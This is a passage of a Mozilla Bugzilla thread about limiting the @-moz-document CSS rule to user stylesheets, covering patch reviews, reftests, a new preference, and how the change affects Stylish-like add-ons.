> add-on development; moreover I know nothing at all about testing add-ons in
> tree.

I'm not an expert on tests myself (at all!), but I believe in this case you could test these regressions as if they happened in native firefox/toolkit stylesheet usage. From all this discussion, I got the impression neither the stylesheet service nor the xml-stylesheet/style/link nodes discriminate for what calls/adds them. Did I get it wrong?

So, something like creating a few different sheets, some with @-moz-documents, some not, which change the visibility of a hidden object. Then verify those cases where the box would be visible (have dimensions) and those where it would not, according to (dis)allowed @-moz-document usage. Bug 1201420 comment 20 seems like a good starting point, unless that was actually unrelated.
If using code for two documents (browser.xul, options.xul) in one overlay is the main problem here, I can of course split it like Luís suggested. It was on my to do list anyway. ;-) The "chrome://global/content/customizeToolbar.xul" is not even used by Fx29+ anymore, right? I guess it can be removed too. So next CTR build will split the overlay.css and get rid of the "@-moz-document" there and also remove the "customizeToolbar.xul" reference. Will this make things easier?
Updating the flag as the patches have been backed out.
Will this fix also address the issue of bug #1209452 (i.e. an extension can inject CSS to hide itself from the list of extensions available at about:addons / the Add-on Manager)? Thanks.
(In reply to Daniel Kabs, reporting bugs since 2002 from comment #51) > Will this fix also address the issue of bug #1209452 (i.e. an extension can > inject CSS to hide itself from list of extensions available at about:addons > or Add-on Manager). Thanks. No. For one the stylesheet service should be unaffected (according to the conclusions of all the discussion, unless I misread something?). Although even if that wasn't the case, it'd be a simple fix for the add-on to get around that.
Rebased patch on current trunk.
Attachment #8656119 - Attachment is obsolete: true
Attachment #8673078 - Flags: review+
Rebased patch on current trunk (no changes required).
Attachment #8656120 - Attachment is obsolete: true
Attachment #8673079 - Flags: review+
Rebased patch on current trunk (no changes required).
Attachment #8673080 - Flags: feedback?(cam)
Sorry for dropping the ball on this. I'm back to fulltime on my research and have extremely limited time for Mozilla hacking. I need significant help from y'all to get this finished.

1) Test builds with the latest patches are available from https://ftp.mozilla.org/pub/mozilla.org/firefox/try-builds/zackw@panix.com-e63594b7a815/ . Everyone with an add-on affected by bug 1201420, please test your add-on thoroughly with these builds. If you're tagged as +needinfo on this bug and you're not Cameron, that means I know you have an affected add-on. Try builds are deleted after a relatively short interval, so please do this soon.

2) I said in comment 47 that "I would appreciate assistance writing test cases that would have caught this regression." I was insufficiently blunt. *I need someone to write those test cases for me.* I do not have time to do it myself even if I already knew how, which I don't.

3) I am considering re-landing patch 1 of this series. It has no user- nor add-on-visible effect by itself, but it changes a bunch of internal C++ APIs around, and required quite a bit of work to update to the current tree. If it were landed by itself that would reduce the amount of scutwork involved in dusting this bug off every couple weeks. Cameron: your thoughts on that?
Flags: needinfo?(cam)
Flags: needinfo?(aris-addons)
Flags: needinfo?(garyshap)
Flags: needinfo?(quicksaver)
Flags: needinfo?(jason.barnabe)
Current CTR (1.4.1) and the above 'try builds' work fine. Tested Win 32 & 64 builds.
Flags: needinfo?(aris-addons)
My add-ons are also fine with the try build.
Flags: needinfo?(quicksaver)
(In reply to Kohei Yoshino [:kohei] from comment #60) > Added the site compatibility doc: > https://www.fxsitecompat.com/en-US/docs/2015/moz-document-support-has-been- > dropped/ Whoa whoa, we haven't landed the patch again. Could you rephrase that to indicate that we *plan* to do this but there isn't a definite timeframe yet?
I'll update the doc if the patch could not be landed to 44 by any chance.
(In reply to Zack Weinberg (:zwol) from comment #57) > 3) I am considering re-landing patch 1 of this series. It has no user- nor > add-on-visible effect by itself, but it changes a bunch of internal C++ APIs > around, and required quite a bit of work to update to the current tree. If > it were landed by itself that would reduce the amount of scutwork involved > in dusting this bug off every couple weeks. Cameron: your thoughts on that? I'm not Cameron, but you should go ahead and land it.
Flags: needinfo?(cam)
(In reply to David Baron [:dbaron] ⌚UTC-7 from comment #63) > (In reply to Zack Weinberg (:zwol) from comment #57) > > 3) I am considering re-landing patch 1 of this series. > I'm not Cameron, but you should go ahead and land it. OK, it will be pushed to inbound shortly. I had to fix merge conflicts *again*, not eight hours later, so here's yet another revision.
Attachment #8657619 - Attachment is obsolete: true
Attachment #8673078 - Attachment is obsolete: true
Attachment #8673341 - Flags: review+
Attachment #8673341 - Flags: checkin+
https://hg.mozilla.org/integration/mozilla-inbound/rev/2416e113e47594b3e5ca403a10b81a4ac37d9400 Bug 1035091 part 1: change CSS parser and loader APIs to distinguish UA, user, and author sheets instead of just UA vs everyone else. r=heycam
... that's new. sorry for the noise, everyone.
Whiteboard: [partially landed, leave open]
Keywords: leave-open
Whiteboard: [partially landed, leave open]
Comment on attachment 8673080 [details] [diff] [review] Patch 3/2 v1b: candidate fix for addons

Review of attachment 8673080 [details] [diff] [review]:
-----------------------------------------------------------------

::: layout/style/Loader.cpp
@@ +329,5 @@
>                            bool aIsAlternate,
>                            nsICSSLoaderObserver* aObserver,
>                            nsIPrincipal* aLoaderPrincipal,
> +                          nsINode* aRequestingNode,
> +                          nsIDocument* aDocument)

I know there are null checks for it, but can aRequestingNode actually be null? If it can't, do we need this extra argument, or will it always be the same as aRequestingNode->OwnerDoc()?

@@ +358,5 @@
> +  // chrome documents are parsed as user rather than author sheets;
> +  // in particular they are allowed to use @-moz-document. See bug 1201420.
> +  //
> +  // XXX Can GetDocumentURI() ever return NULL, and if so, which way should
> +  // the branch go?

Per its comment in nsIDocument.h, it can, but that might just be for cases like document.implementation.createDocument(). I am not sure if a document with no documentURI will ever be in a position to load styles, but I'm thinking not upgrading mParsingMode to eUserSheetFeatures is the thing to do.

@@ +359,5 @@
> +  // in particular they are allowed to use @-moz-document. See bug 1201420.
> +  //
> +  // XXX Can GetDocumentURI() ever return NULL, and if so, which way should
> +  // the branch go?
> +  // XXX Should this be ->GetOriginalURI()? That definitely *does* return

AFAIK the difference between GetDocumentURI() and GetOriginalURI() is just for pushState/popState. But a document's new URI must be the same origin as its original URI, so I think it won't matter which you use here.
Attachment #8673080 - Flags: feedback?(cam) → feedback+
Please also update the documentation in nsIStyleSheetService.idl to mention the new behaviour.
(In reply to Zack Weinberg (:zwol) from comment #57) > 2) I said in comment 47 that "I would appreciate assistance writing test > cases that would have caught this regression." I was insufficiently blunt. > *I need someone to write those test cases for me.* I do not have time to do > it myself even if I already knew how, which I don't. Don't we need to just test that @-moz-document rules apply when using loadAndRegisterSheet(..., AUTHOR_SHEET)? In which case you just need to tweak layout/style/test/chrome/test_moz_document_usability.html in your patch 2 to check this.
Flags: needinfo?(jason.barnabe)
Flags: needinfo?(garyshap)
(In reply to Cameron McCormack (:heycam) from comment #70) > (In reply to Zack Weinberg (:zwol) from comment #57) > > 2) I said in comment 47 that "I would appreciate assistance writing test > > cases that would have caught this regression." I was insufficiently blunt. > > *I need someone to write those test cases for me.* I do not have time to do > > it myself even if I already knew how, which I don't. > > Don't we need to just test that @-moz-document rules apply when using > loadAndRegisterSheet(..., AUTHOR_SHEET)? In which case you just need to > tweak layout/style/test/chrome/test_moz_document_usability.html in your > patch 2 to check this. We also need tests for <?xml-stylesheet?>, <link>, and <style> in chrome:// documents. That's what I don't know how to do -- specifically I don't know how to write a test that will execute from, or have access to, test-specific chrome:// resources.
I missed these queries some time ago... (In reply to Cameron McCormack (:heycam) from comment #68) > Comment on attachment 8673080 [details] [diff] [review] > Patch 3/2 v1b: candidate fix for addons > > Review of attachment 8673080 [details] [diff] [review]: > ----------------------------------------------------------------- > > ::: layout/style/Loader.cpp > @@ +329,5 @@ > > bool aIsAlternate, > > nsICSSLoaderObserver* aObserver, > > nsIPrincipal* aLoaderPrincipal, > > + nsINode* aRequestingNode, > > + nsIDocument* aDocument) > > I know there are null checks for it, but can aRequestingNode actually be > null? If it can't, do we need this extra argument, or will it always be the > same as aRequestingNode->OwnerDoc()? > > @@ +358,5 @@ > > + // chrome documents are parsed as user rather than author sheets; > > + // in particular they are allowed to use @-moz-document. See bug 1201420. > > + // > > + // XXX Can GetDocumentURI() ever return NULL, and if so, which way should > > + // the branch go? > > Per its comment in nsIDocument.h, it can, but that might just be for cases > like document.implementation.createDocument(). I am not sure if a document > with no documentURI will ever be in a position to load styles, but I'm > thinking not upgrading mParsingMode to eUserSheetFeatures is the thing to do. > > @@ +359,5 @@ > > + // in particular they are allowed to use @-moz-document. See bug 1201420. > > + // > > + // XXX Can GetDocumentURI() ever return NULL, and if so, which way should > > + // the branch go? > > + // XXX Should this be ->GetOriginalURI()? That definitely *does* return > > AFAIK the difference between GetDocumentURI() and GetOriginalURI() is just > for pushState/popState. But a document's new URI must be the same origin as > its original URI, so I think it won't matter which you use here. ... but I don't know the answers to any of them. This seems like Boris' department.
Flags: needinfo?(bzbarsky)
> but can aRequestingNode actually be null? Very generally, yes. For example, for @import from ua.css (or heck, for ua.css itself) it will be null. For the specific case of the constructor taking an nsIStyleSheetLinkingElement* argument, which is the one quoted in comment 68, I think.... I don't think it can be null. The three callers are LoadInlineStyle(), which has the <style> element, LoadStyleLink(), which has the <link> element or the document (for the case of Link HTTP headers), and PostLoadEvent which passes mDocument. But of course you don't need to pass this thing through at all, because you can use aLoader->GetDocument(), which will be non-null any time we have access to a document, right? > I am not sure if a document with no documentURI will ever be in a position to load > styles Load them enough to get this far? Unfortunately, yes. The check which will prevent any actual loading happens after this point. So in some sense it doesn't matter what parsing mode you use, since _parsing_ the sheet won't happen. I agree that using the most restrictive mode possible is good. > AFAIK the difference between GetDocumentURI() and GetOriginalURI() is just > for pushState/popState. Yes. I would use GetDocumentURI here.
Flags: needinfo?(bzbarsky)
This is going to break the code in the following popular StackOverflow answer, correct?: http://stackoverflow.com/a/17863685/3342739 (which is also referenced in http://getbootstrap.com/css/#callout-tables-responsive-ff-fieldset )
(In reply to Chris Rebert from comment #75) > This is going to break the code in the following popular StackOverflow > answer, correct?: > http://stackoverflow.com/a/17863685/3342739 > (which is also referenced in > http://getbootstrap.com/css/#callout-tables-responsive-ff-fieldset ) That is correct. Do you have time to dig through Bugzilla and figure out whether the <fieldset> problem that that is working around is already reported, and if not, file a new bug? Then we can make that block this (so the workaround will only stop working when it is no longer necessary). [N.B. I do not expect to have time to work on this or any other Firefox bugs for the foreseeable future.]
(In reply to Zack Weinberg (:zwol) from comment #76) > Do you have time to dig through Bugzilla and figure out whether the > <fieldset> problem that that is working around is already reported, and if > not, file a new bug? Then we can make that block this (so the workaround > will only stop working when it is no longer necessary). It's bug 504622.
Depends on: 504622
Updating the flag as per Comment 71.
Unfortunately, only the first patch in the series landed. This is decidedly *not* going to be fixed for FF44 the way things are going; I do not expect to have time to do it, anyway.
Target Milestone: mozilla43 → Future
Ugh, I misread the commits. Updating the site compat doc...
Resetting owner to default per Zack's request.
Assignee: zackw → nobody
Now that bug 504622 landed, I'm hoping we can reland this soon. I'll try to look into comment 72 sometime in the near future, although I'd also be quite happy if somebody else beats me to it.
I added a user css test in bug 1322634. It would be great if we could add some tests to ensure @-moz-document continue to work in user css.
(In reply to Masatoshi Kimura [:emk] from comment #83) > I added a user css test in bug 1322634. It would be great if we could add > some tests to ensure @-moz-document continue to work in user css. Well, I wrote a patch myself. Try run: https://treeherder.mozilla.org/#/jobs?repo=try&revision=314130c9e869ef4904c6345bb185b4bba42ead58
Attachment #8819487 - Flags: review?(cam)
Comment on attachment 8819487 [details] [diff] [review] Add a reftest to ensure @-moz-document works with user sheets

Review of attachment 8819487 [details] [diff] [review]:
-----------------------------------------------------------------

::: layout/tools/reftest/chrome/userContent.css
@@ +9,5 @@
> +  .reftest-domain {
> +    background: lime !important;
> +  }
> +}
> +@-moz-document domain(mochi.test) {

Is mochi.test a domain that doesn't match this test's URL? To avoid confusion (since some reftests do get run from mochi.test), can you use a domain that doesn't look like it might match, like example.invalid?
Attachment #8819487 - Flags: review?(cam) → review+
Pushed by VYV03354@nifty.ne.jp: https://hg.mozilla.org/integration/mozilla-inbound/rev/84ba5ac23266 Add a reftest to ensure @-moz-document works with user sheets. r=cam
Flags: needinfo?(VYV03354)
Backout by cbook@mozilla.com: https://hg.mozilla.org/integration/mozilla-inbound/rev/b9e8df505dd4 Backed out changeset 84ba5ac23266 for test failures in own test
> [task 2016-12-22T12:27:29.270446Z] 12:27:29 INFO - REFTEST TEST-UNEXPECTED-FAIL | http://10.0.2.2:8854/tests/layout/reftests/usercss/usercss.html == http://10.0.2.2:8854/tests/layout/reftests/usercss/usercss-ref.html | image comparison, max difference: 255, number of differing pixels: 16352

Oh, Android reftests are not loaded on file: URLs :(
Flags: needinfo?(VYV03354)
Pushed by VYV03354@nifty.ne.jp: https://hg.mozilla.org/integration/mozilla-inbound/rev/698b5719c9ee Add a reftest to ensure @-moz-document works with user sheets. r=cam
Patch for check-in, for the record. Android reftest looks good on try.
Attachment #8819487 - Attachment is obsolete: true
Comment on attachment 8932557 [details] Bug 1035091: Disable @-moz-document on author sheets on nightly and early beta.

https://reviewboard.mozilla.org/r/203612/#review209522

I would prefer we keep these tests (by switching the pref on for them) at least until we actually unship it.
Attachment #8932557 - Flags: review?(xidorn+moz)
Comment on attachment 8932995 [details] Bug 1035091: Keep @-moz-document on late beta and later.

https://reviewboard.mozilla.org/r/203992/#review209528

::: modules/libpref/init/all.js:2840
(Diff revision 1)
>  // Should the :visited selector ever match (otherwise :link matches instead)?
>  pref("layout.css.visited_links_enabled", true);
>
> +// Pref to control whether @-moz-document rules are enabled in content pages.
> +#ifdef EARLY_BETA_OR_EARLIER
> +pref("layout.css.moz-document-hidden-from-content", true);

Something like "layout.css.moz-document.content.enabled" might be better?
Attachment #8932995 - Flags: review?(xidorn+moz) → review+
Attachment #8932995 - Attachment is obsolete: true
(In reply to Xidorn Quan [:xidorn] UTC-6 (less responsive Nov 5 ~ Dec 16) from comment #98) > Comment on attachment 8932995 [details] > Bug 1035091: Keep @-moz-document on late beta and later. > > https://reviewboard.mozilla.org/r/203992/#review209528 > > ::: modules/libpref/init/all.js:2840 > (Diff revision 1) > > // Should the :visited selector ever match (otherwise :link matches instead)? > > pref("layout.css.visited_links_enabled", true); > > > > +// Pref to control whether @-moz-document rules are enabled in content pages. > > +#ifdef EARLY_BETA_OR_EARLIER > > +pref("layout.css.moz-document-hidden-from-content", true); > > Something like "layout.css.moz-document.content.enabled" might be better? Err, I read this too late. I can do the rename tomorrow if you insist :).
Comment on attachment 8932557 [details] Bug 1035091: Disable @-moz-document on author sheets on nightly and early beta.

https://reviewboard.mozilla.org/r/203612/#review209554

::: modules/libpref/init/all.js:2838
(Diff revision 3)
> +// Pref to control whether @-moz-document rules are enabled in content pages.
> +#ifdef EARLY_BETA_OR_EARLIER
> +pref("layout.css.moz-document-hidden-from-content", true);
> +#else
> +pref("layout.css.moz-document-hidden-from-content", false);
> +#endif

I still think something like "layout.css.moz-document.content.enabled" would be better.
Attachment #8932557 - Flags: review?(xidorn+moz) → review+
Comment on attachment 8932557 [details] Bug 1035091: Disable @-moz-document on author sheets on nightly and early beta.

https://reviewboard.mozilla.org/r/203612/#review209554

> I still think something like "layout.css.moz-document.content.enabled" would be better.

Yup, renamed.
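After the rename, the all.js hunk presumably ends up along these lines; this is a reconstruction from the review exchange above, not a verbatim quote of the landed patch:

    // Pref to control whether @-moz-document rules are enabled in content pages.
    #ifdef EARLY_BETA_OR_EARLIER
    pref("layout.css.moz-document.content.enabled", false);
    #else
    pref("layout.css.moz-document.content.enabled", true);
    #endif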
Pushed by ecoal95@gmail.com: https://hg.mozilla.org/integration/autoland/rev/37e0bd919af0 Disable @-moz-document on author sheets on nightly and early beta. r=xidorn
Pushed by ecoal95@gmail.com: https://hg.mozilla.org/integration/autoland/rev/b556432c990b Sort the reftest annotations for this bug. r=xidorn
Maybe we can close this bug and file a new bug for flipping the pref in release?
Blocks: 1422245
Yup, filed bug 1422245.
Status: REOPENED → RESOLVED
Closed: 9 years ago → 7 years ago
Resolution: --- → FIXED
Target Milestone: Future → mozilla59
Okay, so this landed on Nightly. What are the consequences for addons? More specifically, I have the case of Stylish-like addons in mind.

Firstly, before the change, I was able to take a style with @-moz-document rules and parse it with this piece of code:

    var doc = document.implementation.createHTMLDocument('');
    var style = doc.createElement('style');
    style.textContent = '@-moz-document domain("plus.google.com") { body { background: #ffffee }}';
    doc.head.appendChild(style);

then loop through style.sheet.cssRules to see if any of them are instanceof CSSMozDocumentRule and, if so, extract conditions from them. (That is needed to apply the style to only the relevant pages.) After the change, style.sheet.cssRules is empty. What is now the blessed way to parse a style and determine whether it applies to a URL?

Secondly, userstyles (as in, the kind of styles that are applied through Stylish-like addons) are usually written under the assumption that they will be applied as author sheets. That is because of CSS conflict resolution rules: for rules of equal specificity, non-!important user sheets lose to author sheets. The userstyle would have to either declare its rules !important, or artificially increase their specificity, in order to win over author sheets. Before the change, it was possible to inject styles using browser.tabs.insertCSS as author sheets. After the change, a style so injected behaves as if it contained no rules. To achieve the desired effect, I would have to parse the content of the @-moz-document block, and inject only that.

Do we (as in addon developers) have to implement our own CSS parsers or bring in third-party libraries as dependencies, or is there a way to use the browser's CSS parser to parse a stylesheet containing @-moz-document rules?
How does Stylish for Chrome deal with the lack of @-moz-document?
(In reply to Masatoshi Kimura [:emk] from comment #111)
> How does Stylish for Chrome deal with the lack of @-moz-document?

Inelegantly. Instead of a single CSS source with site-specific rules enclosed in @-moz-document rules, it has to keep an equivalent JSON structure:

    {
      …various style metadata…,
      "sections": [
        {
          "urls": [],
          "urlPrefixes": [],
          "domains": ["mail.google.com"],
          "regexps": [],
          "code": "body { background: #c0ffee }\n/*multiple lines of CSS*/\n/*more lines*/"
        }
      ]
    }

It then builds a whole UI to let the user enter the code in a multiline editor and urls, urlPrefixes, domains, and regexps in a fiddly "[type combobox] [parameter input] [Add] [Remove]" multi-section form.

One of the reasons to build my own extension over using Stylish or Stylus is to keep my CSS in plain text files (which I edit in Emacs and read over native messaging) and avoid the need for almost any UI. @-moz-document solves that need very well and I wasn't seriously going to support Chrome anyway.
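The matching logic an add-on then has to reimplement in its own JS is roughly the following; a sketch only, with the property names taken from the structure above and the empty-section convention stated as an assumption:

    // Hypothetical sketch of applying one "section" from the JSON structure above.
    function sectionMatches(section, url) {
      const { hostname } = new URL(url);
      return section.urls.includes(url) ||
             section.urlPrefixes.some(p => url.startsWith(p)) ||
             section.domains.some(d => hostname === d ||
                                       hostname.endsWith("." + d)) ||
             section.regexps.some(r => new RegExp("^(?:" + r + ")$").test(url));
    }
    // A section with all four lists empty is typically treated as "match everything".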
(In reply to Yuri Khan from comment #112)
> (In reply to Masatoshi Kimura [:emk] from comment #111)
> > How does Stylish for Chrome deal with the lack of @-moz-document?
>
> Inelegantly.

Well, you could argue about the elegance of walking the cssRules... But fair.

You should be able to still support your use-case injecting the sheet as a user sheet, walking through them, and once you've determined which of them match, injecting them at the author level, right?
(In reply to Emilio Cobos Álvarez [:emilio] from comment #113)
> Well, you could argue about the elegance of walking the cssRules...

I could and I will. Using the CSS parser that comes with the browser to parse CSS, in a temporary empty document that the user never sees, and then walking the CSSOM objects resulting from that parsing, what could be a better idea?

> You should be able to still support your use-case injecting the sheet
> as a user sheet, walking through them, and once you've determined which of
> them match, injecting them at the author level, right?

No, not really. I can inject a style into a tab using browser.tabs.insertCSS. I can later uninject it using browser.tabs.removeCSS. These functions deal with the string in CSS syntax. I do not have any access to the DOM/CSSOM objects that result from this injection. Not from a background script, not from a content script.

I would very much like, in addons, to have access to a CSS parser that actually parses the CSS that is fed into it and faithfully returns all of the results of that parsing. I am not particularly tied to the "create temporary document, create a style element in there" approach; that looked like a clever hack, too. A WebExt-exposed function that takes a string of CSS and returns an array of CSSRule would be just fine.
I think having an API like that makes a lot of sense. Filed bug 1422951 on that.
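What the workaround described above looks like in WebExtension terms; a sketch under the assumption that tabs.insertCSS/removeCSS accept a cssOrigin option, and with extractMatchingRules as a hypothetical helper, not an existing API:

    // Hypothetical sketch: parse out the body of the matching @-moz-document
    // block yourself, then inject just that body at author origin.
    const code = extractMatchingRules(styleText, tab.url); // hypothetical helper

    await browser.tabs.insertCSS(tab.id, {
      code,
      cssOrigin: "author",      // keep the old author-sheet cascade behaviour
      runAt: "document_start",
    });

    // Later, remove it by passing the same details:
    await browser.tabs.removeCSS(tab.id, { code, cssOrigin: "author" });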
Keywords: site-compat
Depends on: 1424633
Depends on: 1426068
We never really documented the -moz- version separately, so I've documented this by adding a note to the @document page, and a note to the Fx59 rel notes: https://developer.mozilla.org/en-US/docs/Web/CSS/@document#Syntax https://developer.mozilla.org/en-US/Firefox/Releases/59#CSS Let me know if you think this is sufficient.
Depends on: 1435385
Whiteboard: [adv-main59-]
Copy and paste loses line breaks after this fix.
Flags: needinfo?(emilio)
Please open a new bug for any regression caused by this one.
Assignee: nobody → emilio
Flags: needinfo?(emilio)
Depends on: 1446442
Blocks: 1446470
No longer blocks: 1446470
Depends on: 1446470
Depends on: 1449682
Blocks: 1449753
Depends on: 1462680
No longer depends on: 1462680
FWIW this is in release already, with the gotcha of bug 1446470, which allows those to work.
Blocks: 1520078
No longer blocks: 1520078
Depends on: 1536143
Regressions: 1615623
No longer depends on: 1446442